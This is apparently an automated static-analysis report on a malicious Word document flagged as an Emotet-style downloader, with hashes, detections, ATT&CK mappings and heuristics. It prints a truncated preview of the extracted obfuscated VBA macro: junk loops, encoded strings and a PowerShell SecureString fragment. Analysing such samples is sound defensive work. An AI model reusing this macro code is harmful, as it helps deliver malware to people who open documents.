Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f313d14627e3e79b…

MALICIOUS

Office (OLE)

Size: 170.5 KB
Created: 2018-03-27 09:47:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: 31caaf81d0a3c1b3c9356eb679b6f91c
SHA-1: f9eba4cf2d7c05f47816b801f6c00685abb1247e
SHA-256: f313d14627e3e79bb4007eb590ef0a8134c329b5e6e86429395a446a0166173a
Risk score: 244

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1140 Deobfuscate/Decode Files or Information

The sample is identified as malicious by ClamAV (Doc.Malware.Emodldr-10025032-0) and contains critical heuristics indicating the presence of auto-executing VBA macros (AutoOpen) that use CreateObject, most likely to download and execute a second-stage payload. The VBA macro code itself is heavily obfuscated, but the presence of the 'macros.bas' artifact and the auto-execution markers strongly suggest downloader or dropper functionality.

Heuristics (9)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 45732 bytes
SHA-256: e50a3d0c57f1d1e0080b0cecff4742fc2b707ed908466398288781720b41e44e
Detection: ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 25 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "BrDFLszDNdQwl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "vrVRATzumvjzbu"
Function CfZijKaRrWbs()
On Error Resume Next
For Each jTGdX In zzhXYZ
      JvEDpP = 51005 - rsCDS
      For Each vkJznF In jjRMHD
         fKCJOa = knzlQ
      Next
   Next
stPMzKTDfdj = YroCp("PQA3ADcAYgA3ADQAYQA3AGYAMgA5ADIAOQBmADYAZABjADQAMQAxAPGL@Sws1", 2, 52)
For Each JoaEZE In DMYZk
      pcMmr = 66455 - ufhqs
      For Each snLzJM In LmrJM
         CwcSmc = ulaYB
      Next
   Next
For Each DvwvA In ZEqliK
      wHHZY = 32922 - znbiq
      For Each CHJjX In iKLPpm
         rBzjEz = oYljj
      Next
   Next
wBTvzi = YroCp("EAGMAMwA5ADkAMABiADIAOQA5ADYAMwAzAGIAOQBjADYAZgAwAGEAZgBkADYAMwA5AGQAZQBkAGYAOABkADIANQAzADcAMQBkADMAYQBlADYAOAAxAGUANQA3ADkAYgAwAGMAMwAwADMAMgBkADIAZQBkAGIAZgAxADkAOQA1ADcANwA4AdNDOl", 2, 177)
For Each owPQUR In cbRuG
      EbMmr = 35460 - jZTwGX
      For Each kjdVZD In pkvvvX
         MPkEZq = fcmtRt
      Next
   Next
For Each LLPFRw In imXTVH
      Jhkvi = 22021 - WdnqA
      For Each qwMsV In BKRBv
         oJpaVL = fdvQZ
      Next
   Next
XOKYuft = YroCp("hifd77BiADUAZAAzADkAMQBmAGUAZQA2ADUAZgA3ADYAYQBkAGMAOQAwADAANQAwAGYAZAA3ADMAMwA2AGYAZgBmAdjm", 7, 83)
For Each Vhbpib In QYFfZ
      zJGwsj = 77491 - uBdvHb
      For Each Vuvhn In AiaUjZ
         iPDKAr = KYfCj
      Next
   Next
For Each ZuEHj In viEOz
      YFfRw = 54721 - mGqVbM
      For Each QvBozs In JOAdWR
         qCtBS = KlqNFb
      Next
   Next
KiIjfJmVZt = YroCp("HDAANgBkADcAYwBmADQAYgA0AGYAOQAyADUAYwAwADEAZABlADAAMwAxAGQAYwAxADcAZgBjADgAOQBhAGQAOAAxADQAYwAxAGUAMwBmADIAOQA2AGYAMwBjAHtDLs", 2, 120)
For Each vNiZc In BsAdPQ
      bPrfn = 53784 - uwDzT
      For Each iTiFn In Wnwwfa
         aPKqY = kLCvuL
      Next
   Next
For Each nLwUt In HuAmY
      kDFHaz = 24292 - XRtEYB
      For Each twQXk In Imiiwd
         aPiOF = EmYYrm
      Next
   Next
aFWhrMGIGwZ = YroCp("bC7bPHKMgB8AGwAYwBIAGsAWQBwv", 8, 19)
For Each HpWRrv In DNwjPn
      bQXZcU = 94333 - Inizb
      For Each PUXZlt In TQQqCl
         NRuwR = cVBzO
      Next
   Next
For Each AJMLQ In XYIVj
      UvrXnf = 31545 - wokIaZ
      For Each DRfwsv In pjuwmZ
         zticG = baFzM
      Next
   Next
WCRoUToITuC = YroCp("I%iLVYgBmADAANgA0ADgAMwBhAGIAMgBiAA=='| CONverTto-SEcUrEstRInG -KE  107,14,255,180,169,48,26,16,200,134,123,115,224,73,153,89,149,125,38,2hmw", 6, 133)
For Each kaLYEl In EUHcWr
      jFLcos = 82640 - wvFfT
      For Each VdLim In LNiHq
         vVCsR = lMcWP
      Next
   Next
For Each NOVibj In IGbjif
      CsswS = 15980 - bUnml
      For Each jiDFR In ZhzUCv
         jQjtui = jaVbU
      Next
   Next
iRQjFOR = YroCp("P.ADQANgAyAGYAYQBhADgANQAyADAANQA4AGMANAA5AGMAOQAxAm@0tEh", 3, 49)
For Each tYmths In iJaDVS
      FWEXp = 3477 - btubtI
      For Each VJMblq In AvEnKF
         XqcXbb = JVwlSm
      Next
   Next
For Each YRQRal In SzjwIC
      fXcXRh = 22596 - OUbBLM
      For Each dBVlh In HwEcr
         tzCWP = rqpIh
      Next
   Next
GlXHDVpOk = YroCp(",ikwwMZA0s", 8, 1)
For Each bUuCvq In aPKWi
      XUnXZX = 89299 - JSfMwM
      For Each UWRUTl In NJFCO
         RJicU = shDSPk
      Next
   Next
For Each jtcmwo In rEJIjc
      shRMbU = 43815 - zIWuLc
      For Each wbDiDi In kLwVP
         khKzjt = BmEzt
      Next
   Next
zHwsibqCHp = YroCp("kMS7V7GIAZQA4AGEAMgBkADIAMAAzADUAZgBmADQAYQBlADgAYgAzAGMAYgBkADkAOQBkADcAYgA2iQJ", 7, 71)
For Each IuUQCc In CHhEB
      rTzFP = 11108 - ZqSzW
      For Each SYoKW In pcafP
         tszvdz = wJBlD
      Next
   Next
For Each koHTi In zjfkmo
      pOGPkR = 11760 - uPhMo
      For Each DNKZa In bMjPzA
         YZdtiB = POMOz
      Next
   Next
cirzwf = YroCp("n%qXzHA4AGYANgA1ADYAYgBlAGUAYwBlADQAZQBkADMAMQd.9", 7, 40)
For Each OFqZaH In ttSULL
      EchrPk = 61006 
... (truncated)